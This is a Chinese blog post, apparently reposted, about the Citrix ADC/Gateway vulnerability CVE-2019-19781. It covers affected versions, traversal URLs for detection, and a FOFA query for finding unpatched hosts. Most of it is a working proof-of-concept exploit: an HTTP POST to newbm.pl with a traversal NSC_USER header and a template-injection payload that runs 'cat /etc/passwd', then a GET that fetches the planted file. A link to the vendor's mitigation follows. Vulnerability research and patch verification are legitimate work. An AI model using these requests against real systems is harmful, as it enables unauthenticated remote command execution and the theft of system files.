漏洞描述

Citrix旗下多款交付控制器和網(wǎng)關(guān)存在RCE漏洞，攻擊者在無(wú)需身份驗(yàn)證的情況下就可執(zhí)行任意命令。根據(jù)其他安全網(wǎng)站的說(shuō)法，這個(gè)RCE漏洞會(huì)有一個(gè)標(biāo)記漏洞（其中之一的標(biāo)記），即本次報(bào)道的Citrx路徑遍歷漏洞（CVE-2019-19781）。Citrx路徑遍歷漏洞（CVE-2019-19781）利用方式的PoC已被公開(kāi)。該漏洞利用復(fù)雜性低，且無(wú)權(quán)限要求，攻擊者只能遍歷vpns文件夾，但攻擊者可能利用Citrx路徑遍歷漏洞進(jìn)行RCE漏洞試探，從而發(fā)起進(jìn)一步精準(zhǔn)攻擊。

影響范圍

Citrix NetScaler ADC and NetScaler Gateway version 10.5，Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 ，Citrix ADC and Citrix Gateway version 13.0

漏洞檢測(cè)方法

根據(jù)此次公開(kāi)的PoC顯示，該洞目錄遍歷被限制子在vpns文件夾下，任意用戶可通過(guò)HTTP請(qǐng)求直接訪問(wèn)該目錄下的文件。

https://xx.xx.xx.xx/vpn/../vpns/services.html https://xx.xx.xx.xx/vpn/../vpns/smb.conf 如果沒(méi)有修復(fù)的話的會(huì)返回 http 200

通過(guò)fofa搜索

title="Citrix"

目前還是有很多沒(méi)打補(bǔ)丁的

附上POC，建議修改文件名，文件名為：jas502n

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 Host: 192.168.3.244 User-Agent: 1 Connection: close NSC_USER: ../../../netscaler/portal/templates/jas502n NSC_NONCE: nsroot Content-Length: 97url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]

請(qǐng)求上傳的內(nèi)容

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1 Host: 192.168.3.244 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close NSC_USER: nsroot NSC_NONCE: nsroot Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

以上代碼來(lái)自jas502n大佬，GitHub地址：https://github.com/jas502n/CVE-2019-19781

修復(fù)建議

請(qǐng)參考官方緩解措施：https://support.citrix.com/article/CTX267679

新人創(chuàng)作打卡挑戰(zhàn)賽發(fā)博客就能抽獎(jiǎng)！定制產(chǎn)品紅包拿不停！

總結(jié)

以上是生活随笔為你收集整理的Citrix路径遍历（CVE-2019-19781）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。